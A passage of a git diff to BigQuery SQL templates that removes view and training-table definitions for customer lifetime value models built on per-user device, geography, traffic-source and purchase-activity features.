checkouts_past_90_120_day, - checkouts_past_120_150_day, - checkouts_past_150_180_day, - -- Gets a row number for each user_pseudo_id ordered by feature_date descending - ROW_NUMBER() OVER (PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS user_row_order - FROM `{{project_id}}.{{dataset}}.customer_lifetime_value_inference_180_90` -) -WHERE - -- Filters only for one row for each user_pseudo_id - user_row_order = 1; - - - CREATE OR REPLACE VIEW `{{project_id}}.{{dataset}}.v_customer_lifetime_value_training_180_180` -(processed_timestamp, - feature_date, - user_pseudo_id, - user_id, - device_category, - device_mobile_brand_name, - device_mobile_model_name, - device_os, - device_language, - device_web_browser, - geo_sub_continent, - geo_country, - geo_region, - geo_city, - geo_metro, - last_traffic_source_medium, - last_traffic_source_name, - last_traffic_source_source, - first_traffic_source_medium, - first_traffic_source_name, - first_traffic_source_source, - has_signed_in_with_user_id, - active_users_past_1_30_day, - active_users_past_30_60_day, - active_users_past_60_90_day, - active_users_past_90_120_day, - active_users_past_120_150_day, - active_users_past_150_180_day, - purchases_past_1_30_day, - purchases_past_30_60_day, - purchases_past_60_90_day, - purchases_past_90_120_day, - purchases_past_120_150_day, - purchases_past_150_180_day, - visits_past_1_30_day, - visits_past_30_60_day, - visits_past_60_90_day, - visits_past_90_120_day, - visits_past_120_150_day, - visits_past_150_180_day, - view_items_past_1_30_day, - view_items_past_30_60_day, - view_items_past_60_90_day, - view_items_past_90_120_day, - view_items_past_120_150_day, - view_items_past_150_180_day, - add_to_carts_past_1_30_day, - add_to_carts_past_30_60_day, - add_to_carts_past_60_90_day, - add_to_carts_past_90_120_day, - add_to_carts_past_120_150_day, - add_to_carts_past_150_180_day, - checkouts_past_1_30_day, - checkouts_past_30_60_day, - checkouts_past_60_90_day, - checkouts_past_90_120_day, - checkouts_past_120_150_day, - checkouts_past_150_180_day - ) -OPTIONS( - --expiration_timestamp=TIMESTAMP_ADD(CURRENT_TIMESTAMP(), INTERVAL {{expiration_duration_hours}} HOUR), - friendly_name="v_customer_lifetime_value_inference_180_180", - description="View Purchase Propensity Inference dataset using 30 days back to predict 15 days ahead. View expires after 48h and should run daily.", - labels=[("org_unit", "development")] -) AS -SELECT DISTINCT - processed_timestamp, - feature_date, - user_pseudo_id, - user_id, - device_category, - device_mobile_brand_name, - device_mobile_model_name, - device_os, - device_language, - device_web_browser, - geo_sub_continent, - geo_country, - geo_region, - geo_city, - geo_metro, - last_traffic_source_medium, - last_traffic_source_name, - last_traffic_source_source, - first_traffic_source_medium, - first_traffic_source_name, - first_traffic_source_source, - has_signed_in_with_user_id, - active_users_past_1_30_day, - active_users_past_30_60_day, - active_users_past_60_90_day, - active_users_past_90_120_day, - active_users_past_120_150_day, - active_users_past_150_180_day, - purchases_past_1_30_day, - purchases_past_30_60_day, - purchases_past_60_90_day, - purchases_past_90_120_day, - purchases_past_120_150_day, - purchases_past_150_180_day, - visits_past_1_30_day, - visits_past_30_60_day, - visits_past_60_90_day, - visits_past_90_120_day, - visits_past_120_150_day, - visits_past_150_180_day, - view_items_past_1_30_day, - view_items_past_30_60_day, - view_items_past_60_90_day, - view_items_past_90_120_day, - view_items_past_120_150_day, - view_items_past_150_180_day, - add_to_carts_past_1_30_day, - add_to_carts_past_30_60_day, - add_to_carts_past_60_90_day, - add_to_carts_past_90_120_day, - add_to_carts_past_120_150_day, - add_to_carts_past_150_180_day, - checkouts_past_1_30_day, - checkouts_past_30_60_day, - checkouts_past_60_90_day, - checkouts_past_90_120_day, - checkouts_past_120_150_day, - checkouts_past_150_180_day -FROM ( -SELECT DISTINCT - processed_timestamp, - feature_date, - user_pseudo_id, - user_id, - device_category, - device_mobile_brand_name, - device_mobile_model_name, - device_os, - device_language, - device_web_browser, - geo_sub_continent, - geo_country, - geo_region, - geo_city, - geo_metro, - last_traffic_source_medium, - last_traffic_source_name, - last_traffic_source_source, - first_traffic_source_medium, - first_traffic_source_name, - first_traffic_source_source, - has_signed_in_with_user_id, - active_users_past_1_30_day, - active_users_past_30_60_day, - active_users_past_60_90_day, - active_users_past_90_120_day, - active_users_past_120_150_day, - active_users_past_150_180_day, - purchases_past_1_30_day, - purchases_past_30_60_day, - purchases_past_60_90_day, - purchases_past_90_120_day, - purchases_past_120_150_day, - purchases_past_150_180_day, - visits_past_1_30_day, - visits_past_30_60_day, - visits_past_60_90_day, - visits_past_90_120_day, - visits_past_120_150_day, - visits_past_150_180_day, - view_items_past_1_30_day, - view_items_past_30_60_day, - view_items_past_60_90_day, - view_items_past_90_120_day, - view_items_past_120_150_day, - view_items_past_150_180_day, - add_to_carts_past_1_30_day, - add_to_carts_past_30_60_day, - add_to_carts_past_60_90_day, - add_to_carts_past_90_120_day, - add_to_carts_past_120_150_day, - add_to_carts_past_150_180_day, - checkouts_past_1_30_day, - checkouts_past_30_60_day, - checkouts_past_60_90_day, - checkouts_past_90_120_day, - checkouts_past_120_150_day, - checkouts_past_150_180_day, - -- Gets a row number for each user_pseudo_id ordered by feature_date descending - ROW_NUMBER() OVER (PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS user_row_order - FROM `{{project_id}}.{{dataset}}.customer_lifetime_value_inference_180_180` -) -WHERE - -- Filter only for one row for each user_pseudo_id - user_row_order = 1; diff --git a/sql/procedure/customer_lifetime_value_training_preparation.sqlx b/sql/procedure/customer_lifetime_value_training_preparation.sqlx index 9780547e..88d9c29f 100644 --- a/sql/procedure/customer_lifetime_value_training_preparation.sqlx +++ b/sql/procedure/customer_lifetime_value_training_preparation.sqlx @@ -560,681 +560,10 @@ CREATE OR REPLACE TABLE `{{project_id}}.{{dataset}}.customer_lifetime_value_trai WHERE pltv_revenue_30_days > 0.0 ); --- Prepares the non-duplocated features and labels for the CLTV model looking back 180 days to predict 90 days. -CREATE OR REPLACE TABLE `{{project_id}}.{{dataset}}.customer_lifetime_value_training_180_90` AS( - SELECT DISTINCT - -- Current timestamp for processing time - CURRENT_TIMESTAMP() AS processed_timestamp, - -- Data split for training and testing - data_split, - -- Feature date for the features - feature_date, - -- User pseudo id for identifying users - user_pseudo_id, - -- Get the latest user id for each user and feature date - LAST_VALUE(user_id) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS user_id, - -- Get the latest device category for each user and feature date - LAST_VALUE(device_category) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS device_category, - -- Get the latest device mobile brand name for each user and feature date - LAST_VALUE(device_mobile_brand_name) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS device_mobile_brand_name, - -- Get the latest device mobile model name for each user and feature date - LAST_VALUE(device_mobile_model_name) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS device_mobile_model_name, - -- Get the latest device os for each user and feature date - LAST_VALUE(device_os) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS device_os, - -- Get the latest device language for each user and feature date - LAST_VALUE(device_language) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS device_language, - -- Get the latest device web browser for each user and feature date - LAST_VALUE(device_web_browser) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS device_web_browser, - -- Get the latest geo sub continent for each user and feature date - LAST_VALUE(geo_sub_continent) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS geo_sub_continent, - -- Get the latest geo country for each user and feature date - LAST_VALUE(geo_country) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS geo_country, - -- Get the latest geo region for each user and feature date - LAST_VALUE(geo_region) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS geo_region, - -- Get the latest geo city for each user and feature date - LAST_VALUE(geo_city) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS geo_city, - -- Get the latest geo metro for each user and feature date - LAST_VALUE(geo_metro) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS geo_metro, - -- Get the latest last traffic source medium for each user and feature date - LAST_VALUE(last_traffic_source_medium) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS last_traffic_source_medium, - -- Get the latest last traffic source name for each user and feature date - LAST_VALUE(last_traffic_source_name) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS last_traffic_source_name, - -- Get the latest last traffic source source for each user and feature date - LAST_VALUE(last_traffic_source_source) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS last_traffic_source_source, - -- Get the latest first traffic source medium for each user and feature date - LAST_VALUE(first_traffic_source_medium) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS first_traffic_source_medium, - -- Get the latest first traffic source name for each user and feature date - LAST_VALUE(first_traffic_source_name) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS first_traffic_source_name, - -- Get the latest first traffic source source for each user and feature date - LAST_VALUE(first_traffic_source_source) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS first_traffic_source_source, - -- Get the latest has signed in with user id for each user and feature date - LAST_VALUE(has_signed_in_with_user_id) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS has_signed_in_with_user_id, - -- Get the latest active users past 1-30 day for each user and feature date - LAST_VALUE(active_users_past_1_30_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS active_users_past_1_30_day, - -- Get the latest active users past 30-60 day for each user and feature date - LAST_VALUE(active_users_past_30_60_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS active_users_past_30_60_day, - -- Get the latest active users past 60-90 day for each user and feature date - LAST_VALUE(active_users_past_60_90_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS active_users_past_60_90_day, - -- Get the latest active users past 90-120 day for each user and feature date - LAST_VALUE(active_users_past_90_120_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS active_users_past_90_120_day, - -- Get the latest active users past 120-150 day for each user and feature date - LAST_VALUE(active_users_past_120_150_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS active_users_past_120_150_day, - -- Get the latest active users past 150-180 day for each user and feature date - LAST_VALUE(active_users_past_150_180_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS active_users_past_150_180_day, - -- Get the latest purchases past 1-30 day for each user and feature date - LAST_VALUE(purchases_past_1_30_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS purchases_past_1_30_day, - -- Get the latest purchases past 30-60 day for each user and feature date - LAST_VALUE(purchases_past_30_60_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS purchases_past_30_60_day, - -- Get the latest purchases past 60-90 day for each user and feature date - LAST_VALUE(purchases_past_60_90_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS purchases_past_60_90_day, - -- Get the latest purchases past 90-120 day for each user and feature date - LAST_VALUE(purchases_past_90_120_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS purchases_past_90_120_day, - -- Get the latest purchases past 120-150 day for each user and feature date - LAST_VALUE(purchases_past_120_150_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS purchases_past_120_150_day, - -- Get the latest purchases past 150-180 day for each user and feature date - LAST_VALUE(purchases_past_150_180_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS purchases_past_150_180_day, - -- Get the latest visits past 1-30 day for each user and feature date - LAST_VALUE(visits_past_1_30_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS visits_past_1_30_day, - -- Get the latest visits past 30-60 day for each user and feature date - LAST_VALUE(visits_past_30_60_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS visits_past_30_60_day, - -- Get the latest visits past 60-90 day for each user and feature date - LAST_VALUE(visits_past_60_90_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS visits_past_60_90_day, - -- Get the latest visits past 90-120 day for each user and feature date - LAST_VALUE(visits_past_90_120_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS visits_past_90_120_day, - -- Get the latest visits past 120-150 day for each user and feature date - LAST_VALUE(visits_past_120_150_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS visits_past_120_150_day, - -- Get the latest visits past 150-180 day for each user and feature date - LAST_VALUE(visits_past_150_180_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS visits_past_150_180_day, - -- Get the latest view items past 1-30 day for each user and feature date - LAST_VALUE(view_items_past_1_30_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS view_items_past_1_30_day, - -- Get the latest view items past 30-60 day for each user and feature date - LAST_VALUE(view_items_past_30_60_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS view_items_past_30_60_day, - -- Get the latest view items past 60-90 day for each user and feature date - LAST_VALUE(view_items_past_60_90_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS view_items_past_60_90_day, - -- Get the latest view items past 90-120 day for each user and feature date - LAST_VALUE(view_items_past_90_120_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS view_items_past_90_120_day, - -- Get the latest view items past 120-150 day for each user and feature date - LAST_VALUE(view_items_past_120_150_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS view_items_past_120_150_day, - -- Get the latest view items past 150-180 day for each user and feature date - LAST_VALUE(view_items_past_150_180_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS view_items_past_150_180_day, - -- Get the latest add to carts past 1-30 day for each user and feature date - LAST_VALUE(add_to_carts_past_1_30_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS add_to_carts_past_1_30_day, - -- Get the latest add to carts past 30-60 day for each user and feature date - LAST_VALUE(add_to_carts_past_30_60_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS add_to_carts_past_30_60_day, - -- Get the latest add to carts past 60-90 day for each user and feature date - LAST_VALUE(add_to_carts_past_60_90_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS add_to_carts_past_60_90_day, - -- Get the latest add to carts past 90-120 day for each user and feature date - LAST_VALUE(add_to_carts_past_90_120_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS add_to_carts_past_90_120_day, - -- Get the latest add to carts past 120-150 day for each user and feature date - LAST_VALUE(add_to_carts_past_120_150_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS add_to_carts_past_120_150_day, - -- Get the latest add to carts past 150-180 day for each user and feature date - LAST_VALUE(add_to_carts_past_150_180_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS add_to_carts_past_150_180_day, - -- Get the latest checkouts past 1-30 day for each user and feature date - LAST_VALUE(checkouts_past_1_30_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS checkouts_past_1_30_day, - -- Get the latest checkouts past 30-60 day for each user and feature date - LAST_VALUE(checkouts_past_30_60_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS checkouts_past_30_60_day, - -- Get the latest checkouts past 60-90 day for each user and feature date - LAST_VALUE(checkouts_past_60_90_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS checkouts_past_60_90_day, - -- Get the latest checkouts past 90-120 day for each user and feature date - LAST_VALUE(checkouts_past_90_120_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS checkouts_past_90_120_day, - -- Get the latest checkouts past 120-150 day for each user and feature date - LAST_VALUE(checkouts_past_120_150_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS checkouts_past_120_150_day, - -- Get the latest checkouts past 150-180 day for each user and feature date - LAST_VALUE(checkouts_past_150_180_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS checkouts_past_150_180_day, - -- Get the latest pltv revenue 90 days for each user and feature date - LAST_VALUE(pltv_revenue_90_days) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS pltv_revenue_90_days - FROM `{{project_id}}.{{dataset}}.{{insert_table}}` - -- Filter for users with pltv revenue 90 days greater than 0 - WHERE pltv_revenue_90_days > 0.0 -); - --- Prepares the non-duplocated features and labels for the CLTV model looking back 180 days to predict 180 days. -CREATE OR REPLACE TABLE `{{project_id}}.{{dataset}}.customer_lifetime_value_training_180_180` AS( - SELECT DISTINCT - -- Captures the current timestamp when the query is executed. - CURRENT_TIMESTAMP() AS processed_timestamp, - -- Represents the data split (e.g., train, validation, test). - data_split, - -- Represents the date for which features are extracted. - feature_date, - -- Represents the unique identifier for a user. - user_pseudo_id, - -- Extracts the latest user ID for each user, based on the feature_date, using the LAST_VALUE window function. - LAST_VALUE(user_id) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS user_id, - -- Extracts the latest device category for each user, based on the feature_date, using the LAST_VALUE window function. - LAST_VALUE(device_category) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS device_category, - -- Extracts the latest device brand name for each user, based on the feature_date, using the LAST_VALUE window function. - LAST_VALUE(device_mobile_brand_name) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS device_mobile_brand_name, - -- Extracts the latest device model name for each user, based on the feature_date, using the LAST_VALUE window function. - LAST_VALUE(device_mobile_model_name) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS device_mobile_model_name, - -- Extracts the latest device operating system for each user, based on the feature_date, using the LAST_VALUE window function. - LAST_VALUE(device_os) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS device_os, - -- Extracts the latest device language for each user, based on the feature_date, using the LAST_VALUE window function. - LAST_VALUE(device_language) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS device_language, - -- Extracts the latest device web browser for each user, based on the feature_date, using the LAST_VALUE window function. - LAST_VALUE(device_web_browser) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS device_web_browser, - -- Extracts the latest geographic sub-continent for each user, based on the feature_date, using the LAST_VALUE window function. - LAST_VALUE(geo_sub_continent) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS geo_sub_continent, - -- Extracts the latest geographic country for each user, based on the feature_date, using the LAST_VALUE window function. - LAST_VALUE(geo_country) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS geo_country, - -- Extracts the latest geographic region for each user, based on the feature_date, using the LAST_VALUE window function. - LAST_VALUE(geo_region) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS geo_region, - -- Extracts the latest geographic city for each user, based on the feature_date, using the LAST_VALUE window function. - LAST_VALUE(geo_city) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS geo_city, - -- Extracts the latest geographic metropolitan area for each user, based on the feature_date, using the LAST_VALUE window function. - LAST_VALUE(geo_metro) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS geo_metro, - -- Extracts the latest last traffic source medium for each user, based on the feature_date, using the LAST_VALUE window function. - LAST_VALUE(last_traffic_source_medium) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS last_traffic_source_medium, - -- Extracts the latest last traffic source name for each user, based on the feature_date, using the LAST_VALUE window function. - LAST_VALUE(last_traffic_source_name) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS last_traffic_source_name, - -- Extracts the latest last traffic source for each user, based on the feature_date, using the LAST_VALUE window function. - LAST_VALUE(last_traffic_source_source) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS last_traffic_source_source, - -- Extracts the latest first traffic source medium for each user, based on the feature_date, using the LAST_VALUE window function. - LAST_VALUE(first_traffic_source_medium) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS first_traffic_source_medium, - -- Extracts the latest first traffic source name for each user, based on the feature_date, using the LAST_VALUE window function. - LAST_VALUE(first_traffic_source_name) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS first_traffic_source_name, - -- Extracts the latest first traffic source for each user, based on the feature_date, using the LAST_VALUE window function. - LAST_VALUE(first_traffic_source_source) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS first_traffic_source_source, - -- Extracts the latest user's sign-in status for each user, based on the feature_date, using the LAST_VALUE window function. - LAST_VALUE(has_signed_in_with_user_id) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS has_signed_in_with_user_id, - -- Extracts the latest number of active users in the past 1-30 days for each user, based on the feature_date, using the LAST_VALUE window function. - LAST_VALUE(active_users_past_1_30_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS active_users_past_1_30_day, - -- Extracts the latest number of active users in the past 30-60 days for each user, based on the feature_date, using the LAST_VALUE window function. - LAST_VALUE(active_users_past_30_60_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS active_users_past_30_60_day, - -- Extracts the latest number of active users in the past 60-90 days for each user, based on the feature_date, using the LAST_VALUE window function. - LAST_VALUE(active_users_past_60_90_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS active_users_past_60_90_day, - -- Extracts the latest number of active users in the past 90-120 days for each user, based on the feature_date, using the LAST_VALUE window function. - LAST_VALUE(active_users_past_90_120_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS active_users_past_90_120_day, - -- Extracts the latest number of active users in the past 120-150 days for each user, based on the feature_date, using the LAST_VALUE window function. - LAST_VALUE(active_users_past_120_150_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS active_users_past_120_150_day, - -- Extracts the latest number of active users in the past 150-180 days for each user, based on the feature_date, using the LAST_VALUE window function. - LAST_VALUE(active_users_past_150_180_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS active_users_past_150_180_day, - -- Extracts the latest number of purchases in the past 1-30 days for each user, based on the feature_date, using the LAST_VALUE window function. - LAST_VALUE(purchases_past_1_30_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS purchases_past_1_30_day, - -- Extracts the latest number of purchases in the past 30-60 days for each user, based on the feature_date, using the LAST_VALUE window function. - LAST_VALUE(purchases_past_30_60_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS purchases_past_30_60_day, - -- Extracts the latest number of purchases in the past 60-90 days for each user, based on the feature_date, using the LAST_VALUE window function. - LAST_VALUE(purchases_past_60_90_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS purchases_past_60_90_day, - -- Extracts the latest number of purchases in the past 90-120 days for each user, based on the feature_date, using the LAST_VALUE window function. - LAST_VALUE(purchases_past_90_120_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS purchases_past_90_120_day, - -- Extracts the latest number of purchases in the past 120-150 days for each user, based on the feature_date, using the LAST_VALUE window function. - LAST_VALUE(purchases_past_120_150_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS purchases_past_120_150_day, - -- Extracts the latest number of purchases in the past 150-180 days for each user, based on the feature_date, using the LAST_VALUE window function. - LAST_VALUE(purchases_past_150_180_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS purchases_past_150_180_day, - -- Extracts the latest number of visits in the past 1-30 days for each user, based on the feature_date, using the LAST_VALUE window function. - LAST_VALUE(visits_past_1_30_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS visits_past_1_30_day, - -- Extracts the latest number of visits in the past 30-60 days for each user, based on the feature_date, using the LAST_VALUE window function. - LAST_VALUE(visits_past_30_60_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS visits_past_30_60_day, - -- Extracts the latest number of visits in the past 60-90 days for each user, based on the feature_date, using the LAST_VALUE window function. - LAST_VALUE(visits_past_60_90_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS visits_past_60_90_day, - -- Extracts the latest number of visits in the past 90-120 days for each user, based on the feature_date, using the LAST_VALUE window function. - LAST_VALUE(visits_past_90_120_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS visits_past_90_120_day, - -- Extracts the latest number of visits in the past 120-150 days for each user, based on the feature_date, using the LAST_VALUE window function. - LAST_VALUE(visits_past_120_150_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS visits_past_120_150_day, - -- Extracts the latest number of visits in the past 150-180 days for each user, based on the feature_date, using the LAST_VALUE window function. - LAST_VALUE(visits_past_150_180_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS visits_past_150_180_day, - -- Extracts the latest number of viewed items in the past 1-30 days for each user, based on the feature_date, using the LAST_VALUE window function. - LAST_VALUE(view_items_past_1_30_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS view_items_past_1_30_day, - -- Extracts the latest number of viewed items in the past 30-60 days for each user, based on the feature_date, using the LAST_VALUE window function. - LAST_VALUE(view_items_past_30_60_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS view_items_past_30_60_day, - -- Extracts the latest number of viewed items in the past 60-90 days for each user, based on the feature_date, using the LAST_VALUE window function. - LAST_VALUE(view_items_past_60_90_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS view_items_past_60_90_day, - -- Extracts the latest number of viewed items in the past 90-120 days for each user, based on the feature_date, using the LAST_VALUE window function. - LAST_VALUE(view_items_past_90_120_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS view_items_past_90_120_day, - -- Extracts the latest number of viewed items in the past 120-150 days for each user, based on the feature_date, using the LAST_VALUE window function. - LAST_VALUE(view_items_past_120_150_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS view_items_past_120_150_day, - -- Extracts the latest number of viewed items in the past 150-180 days for each user, based on the feature_date, using the LAST_VALUE window function. - LAST_VALUE(view_items_past_150_180_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS view_items_past_150_180_day, - -- Extracts the latest number of items added to carts in the past 1-30 days for each user, based on the feature_date, using the LAST_VALUE window function. - LAST_VALUE(add_to_carts_past_1_30_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS add_to_carts_past_1_30_day, - -- Extracts the latest number of items added to carts in the past 30-60 days for each user, based on the feature_date, using the LAST_VALUE window function. - LAST_VALUE(add_to_carts_past_30_60_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS add_to_carts_past_30_60_day, - -- Extracts the latest number of items added to carts in the past 60-90 days for each user, based on the feature_date, using the LAST_VALUE window function. - LAST_VALUE(add_to_carts_past_60_90_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS add_to_carts_past_60_90_day, - -- Extracts the latest number of items added to carts in the past 90-120 days for each user, based on the feature_date, using the LAST_VALUE window function. - LAST_VALUE(add_to_carts_past_90_120_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS add_to_carts_past_90_120_day, - -- Extracts the latest number of items added to carts in the past 120-150 days for each user, based on the feature_date, using the LAST_VALUE window function. - LAST_VALUE(add_to_carts_past_120_150_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS add_to_carts_past_120_150_day, - -- Extracts the latest number of items added to carts in the past 150-180 days for each user, based on the feature_date, using the LAST_VALUE window function. - LAST_VALUE(add_to_carts_past_150_180_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS add_to_carts_past_150_180_day, - -- Extracts the latest number of checkouts in the past 1-30 days for each user, based on the feature_date, using the LAST_VALUE window function. - LAST_VALUE(checkouts_past_1_30_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS checkouts_past_1_30_day, - -- Extracts the latest number of checkouts in the past 30-60 days for each user, based on the feature_date, using the LAST_VALUE window function. - LAST_VALUE(checkouts_past_30_60_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS checkouts_past_30_60_day, - -- Extracts the latest number of checkouts in the past 60-90 days for each user, based on the feature_date, using the LAST_VALUE window function. - LAST_VALUE(checkouts_past_60_90_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS checkouts_past_60_90_day, - -- Extracts the latest number of checkouts in the past 90-120 days for each user, based on the feature_date, using the LAST_VALUE window function. - LAST_VALUE(checkouts_past_90_120_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS checkouts_past_90_120_day, - -- Extracts the latest number of checkouts in the past 120-150 days for each user, based on the feature_date, using the LAST_VALUE window function. - LAST_VALUE(checkouts_past_120_150_day) OVER(PARTITION BY user_pseudo_id, 